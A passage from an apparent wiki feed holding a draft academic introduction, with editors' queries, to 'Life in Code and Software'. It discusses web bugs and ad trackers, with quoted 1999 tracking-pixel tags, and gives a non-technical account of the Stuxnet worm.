=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4701</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4701"/>
		<updated>2012-04-18T13:52:40Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
